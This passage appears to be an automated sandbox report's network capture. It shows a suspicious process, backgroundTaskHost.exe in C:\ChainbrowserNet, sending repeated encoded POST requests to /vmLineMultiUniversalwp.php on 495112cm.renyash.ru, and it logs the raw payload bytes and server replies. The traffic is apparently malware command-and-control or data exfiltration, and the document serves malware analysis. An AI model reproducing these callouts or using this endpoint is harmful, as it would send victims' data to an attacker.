                                                                                          Jan 4, 2025 11:07:37.160573006 CET922INData Raw: 73 73 4b 76 4f 64 4f 77 71 54 09 7c 4e 66 40 77 72 79 07 75 75 78 09 7c 42 71 01 74 6c 7c 04 7f 5d 78 03 79 7c 63 45 7b 70 7e 07 7d 6d 6c 08 77 67 5a 05 7e 62 50 0b 7d 6d 51 0b 78 6d 76 4c 7f 72 53 40 7f 60 52 40 7f 42 74 0b 7d 5e 56 0b 7c 77 7e
                                                                                          Data Ascii: ssKvOdOwqT|Nf@wryuux|Bqtl|]xy|cE{p~}mlwgZ~bP}mQxmvLrS@`R@Bt}^V|w~L{}{xLxK_Y~wg~`ezMhL}rVFvsiyO[vXVE~vh~vaOtrcIbSO}w~{v^A|cwHvr[tOS_b}R`}Ywuawx\u~N_xYZxg^y}gyLxIzcz{]NZ{dgZi\cwaVJjlR^hth_PSvR|{lw]c`eP
                                                                                          Jan 4, 2025 11:07:37.585690975 CET292OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 384
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:37.679642916 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:37.679955959 CET384OUTData Raw: 54 58 5e 5e 50 5e 5f 57 5c 5b 52 58 57 5d 58 5f 58 53 5a 5b 52 55 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX^^P^_W\[RXW]X_XSZ[RUQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*9'A"(%V&#X=%5=>$=7S!>+/(64 >*+!Y#!Y,
                                                                                          Jan 4, 2025 11:07:37.932800055 CET969INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSi2haKWi%2Bebx4l14qf3a6zw9hRhpktAYL9k%2F3L8tURLb%2Ft%2B2LcQKDD1Y1NYsyJnM99OqME7SszdhSg1RUkDOuY6jiR%2FWw%2FQBvvVxmyU9YT6WUsb2hAqnDBEg%2FRH%2BRZ%2BamIftMJn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c343ea76a5f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3535&min_rtt=1622&rtt_var=3732&sent=9&recv=9&lost=0&retrans=0&sent_bytes=2208&recv_bytes=1336&delivery_rate=2540603&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0a 2b 58 3f 0c 21 2f 38 58 29 00 0f 03 31 09 23 00 2f 31 33 19 20 2f 2c 01 38 0c 3e 03 24 0d 33 01 2a 01 24 1d 23 0e 2b 1c 33 30 2a 5d 06 12 38 58 3c 2c 39 03 32 05 31 0d 2a 22 22 09 33 35 26 5e 27 03 3f 5b 3f 2c 3a 05 25 3c 14 0f 2a 3f 25 01 3a 03 3c 46 38 05 2f 08 36 03 21 53 08 13 20 54 26 0f 2f 56 29 20 29 1f 25 55 3e 02 30 04 2b 1d 2a 3b 30 1b 30 00 36 5b 39 0f 02 00 3c 0d 28 5b 2d 58 20 5c 28 3d 24 0c 27 2c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+X?!/8X)1#/13 /,8>$3*$#+30*]8X<,921*""35&^'?[?,:%<*?%:<F8/6!S T&/V) )%U>0+*;006[9<([-X \(=$',"\ #V=WL0
                                                                                          Jan 4, 2025 11:07:38.090375900 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:38.184317112 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:38.184494019 CET1844OUTData Raw: 51 5d 5e 53 55 5a 5f 57 5c 5b 52 58 57 5f 58 58 58 54 5a 59 52 56 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q]^SUZ_W\[RXW_XXXTZYRVQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=/7"20<*1"="0'V .&S(< (6+_7*X*!Y#!Y,2
                                                                                          Jan 4, 2025 11:07:38.494893074 CET963INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:38 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ncQpB5qATQRXKsb%2FP2WtolH%2BzuOGzFuAyKZbFDIsHFLx7l4Yn%2BOJEglKLm2w8MnllURgdtBLzhwSrkMu6RAadoWm%2FlfsWtBcGV%2Bd6YXfi6Clo4bFb1F5uwu7XhnHvQEIQHUEuqeS"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c3759096a5f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5682&min_rtt=1622&rtt_var=7194&sent=15&recv=14&lost=0&retrans=0&sent_bytes=3202&recv_bytes=3473&delivery_rate=2540603&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 56 29 3e 20 50 22 06 33 01 2a 07 25 07 26 30 38 12 3b 21 24 03 22 3f 30 03 2f 32 29 10 27 20 28 58 3e 3f 28 55 37 0e 28 08 24 1a 2a 5d 06 12 38 58 28 5a 3e 5b 25 38 2d 0e 2a 32 3d 18 33 26 29 01 24 13 3f 5c 28 12 31 5f 25 02 29 56 2b 2f 2a 5f 2e 3a 27 1f 2d 3f 2f 0e 21 13 21 53 08 13 20 56 25 57 3f 57 29 1e 25 10 31 33 29 5d 24 2a 09 1d 3d 2b 2c 52 24 3e 0f 02 2c 31 23 59 2b 30 24 12 2d 00 27 06 2b 3e 23 54 25 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$V)> P"3*%&08;!$"?0/2)' (X>?(U7($*]8X(Z>[%8-*2=3&)$?\(1_%)V+/*_.:'-?/!!S V%W?W)%13)]$*=+,R$>,1#Y+0$-'+>#T%<"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.449737104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:37.821638107 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:38.170082092 CET2520OUTData Raw: 51 5c 5e 5e 50 59 5a 55 5c 5b 52 58 57 59 58 53 58 5c 5a 5a 52 5c 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^^PYZU\[RXWYXSX\ZZR\QX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-**#E48"20'(?1Z!.60X$#R<?;Y?5#[42^+;!Y#!Y,*
                                                                                          Jan 4, 2025 11:07:38.266511917 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:38.533514023 CET800INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:38 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LShWaaTOhTnmxPbBvO3uHhRRexp5xgGuEw170V8IssSjLNDnSxDljaJqhKrc0ppEtSKNLMyj1uxzDC0a514Q160qJeEXgZbw8eEnSt2d%2BovIcjlft3vmQLroROEexVrjW4GF56jA"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c37ee8578dc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3949&min_rtt=1861&rtt_var=4875&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=78612&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.449738104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:38.732323885 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:07:39.076467037 CET2520OUTData Raw: 51 5d 5e 54 55 5f 5a 5d 5c 5b 52 58 57 52 58 58 58 51 5a 5e 52 56 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q]^TU_Z]\[RXWRXXXQZ^RVQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B()7B#"'0+X)<]">5[&>R#="R+/ (64>>+!Y#!Y,
                                                                                          Jan 4, 2025 11:07:39.195727110 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:39.467880964 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:39 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4JwHXCZoTlPp%2BWm6asRXEe8NcjJycE9NAIJj2i1eYFgGNePdP%2FZari9XHmzYg6Azcy4DZ9mFFUyt7z7ujShF080Q704zAOU%2BPt%2FOuYN9eyVx%2F8Q8Hqo7RRkTxdRM9sqN5BEcZSv"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c3dad454378-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3364&min_rtt=1728&rtt_var=3921&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=98502&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.449739104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:39.795540094 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:40.154757977 CET2520OUTData Raw: 51 59 5e 50 55 53 5a 55 5c 5b 52 58 57 5c 58 5f 58 50 5a 5a 52 54 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^PUSZU\[RXW\X_XPZZRTQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E()'"+!13+(,-"-!\0;W X*W<;^(%'4>^=;!Y#!Y,>
                                                                                          Jan 4, 2025 11:07:40.254442930 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:40.519656897 CET802INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:40 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPOk148uMmd0ununAlG%2Fjx%2BPEdnkUNx11zi6Liuyr3bvx4ZhdDaedTz8KvA1r7F6o5jeZ2jHtTrpVKhySlpHlaCyLK3PNjhehcpITMBXBmFap5mj03QRke980fPxrDzXdmjUUEsT"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c444aad18b8-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3479&min_rtt=1458&rtt_var=4589&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=82822&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.449742104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:41.029134989 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:41.373244047 CET2520OUTData Raw: 54 5f 5b 50 50 5b 5a 5c 5c 5b 52 58 57 52 58 5f 58 52 5a 58 52 54 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[PP[Z\\[RXWRX_XRZXRTQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.):74Q2#>Z9]"='-846Q?Z#]+$#"[=!Y#!Y,
                                                                                          Jan 4, 2025 11:07:41.476635933 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:41.753307104 CET809INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:41 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ORQj7LXnzTaoHTZZGrLNdGI4QrRKcU4tIOg%2FwfJ2Vgnhuk67dl%2FphA4JwXtMw%2F2H3ZWbAWSan6cHabVjOvEtq97iVjt5%2FVZXRZvOJ%2FR4dk2FCtMcxGQWwamiKermTGtBeabS5Yyl"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c4bff1b421b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3424&min_rtt=2123&rtt_var=3398&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=116492&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.449743104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:42.264420033 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:42.623254061 CET2520OUTData Raw: 54 5f 5b 52 55 58 5f 54 5c 5b 52 58 57 52 58 5c 58 57 5a 5d 52 5c 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[RUX_T\[RXWRX\XWZ]R\QW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.>4 )&3()?&5>:3?P7>&R<,,(67-)+!Y#!Y,
                                                                                          Jan 4, 2025 11:07:42.718677044 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:42.933715105 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:42.979851007 CET807INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mVbTncp873CGeYfdg4CGqcKbs%2B5yAiQICXo%2FbCeJ3FNYGaBGgthvJtT1X5DWhFDAkRdP9XqEy9hJZSHo3%2FHqh13xLInykaRugQSXDg%2BTaTDIGXxbyPM4kMt57y41wKa1vn3bYtRM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c53b8e2c339-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8040&min_rtt=1681&rtt_var=13349&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=27779&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.449745104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:43.319298983 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.449746104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:43.521172047 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:43.873435020 CET1844OUTData Raw: 51 5a 5b 54 50 5b 5f 54 5c 5b 52 58 57 52 58 59 58 53 5a 52 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ[TP[_T\[RXWRXYXSZRRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)*?C#(20#=,[!=6&>8#>!??5 4-)!Y#!Y,
                                                                                          Jan 4, 2025 11:07:43.984154940 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:45.280385017 CET961INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ehHbaAOlBOZ8ROUlgkYUUhSX7ZDbPgXs%2FXXtsuflBLs%2B7S%2FSpRZIPV%2BKaY7bZAQ6cWIQFu9mww%2FK9AVLEnIq7%2FkmKfwoI%2Fo1k8jc8DMAu7K0DdstAwz1tj8DEZRIbW8Dwgj3YOP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c5b998343ac-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4431&min_rtt=1713&rtt_var=6080&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=62225&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 53 29 2d 20 55 36 06 24 12 29 07 3e 5a 25 20 05 06 3b 08 28 06 34 3c 30 03 38 32 0c 01 33 0d 28 58 2a 3c 24 54 37 1e 2f 1e 27 0a 2a 5d 06 12 3b 00 28 3c 31 00 26 38 2a 52 3e 0b 21 18 30 18 3e 5e 30 3d 0d 5a 28 02 32 07 25 3f 26 08 29 11 36 5a 3a 2a 2f 1e 38 05 30 1c 22 39 21 53 08 13 20 1e 26 0f 2b 10 2a 1e 22 01 31 0d 3e 04 30 39 34 0e 29 3b 34 50 25 3e 04 5d 2d 08 2b 11 3f 55 3b 00 39 3d 24 15 3e 3e 33 50 33 16 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$S)- U6$)>Z% ;(4<0823(X*<$T7/'*];(<1&8*R>!0>^0=Z(2%?&)6Z:*/80"9!S &+*"1>094);4P%>]-+?U;9=$>>3P3"\ #V=WL0
                                                                                          Jan 4, 2025 11:07:45.280451059 CET961INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ehHbaAOlBOZ8ROUlgkYUUhSX7ZDbPgXs%2FXXtsuflBLs%2B7S%2FSpRZIPV%2BKaY7bZAQ6cWIQFu9mww%2FK9AVLEnIq7%2FkmKfwoI%2Fo1k8jc8DMAu7K0DdstAwz1tj8DEZRIbW8Dwgj3YOP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c5b998343ac-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
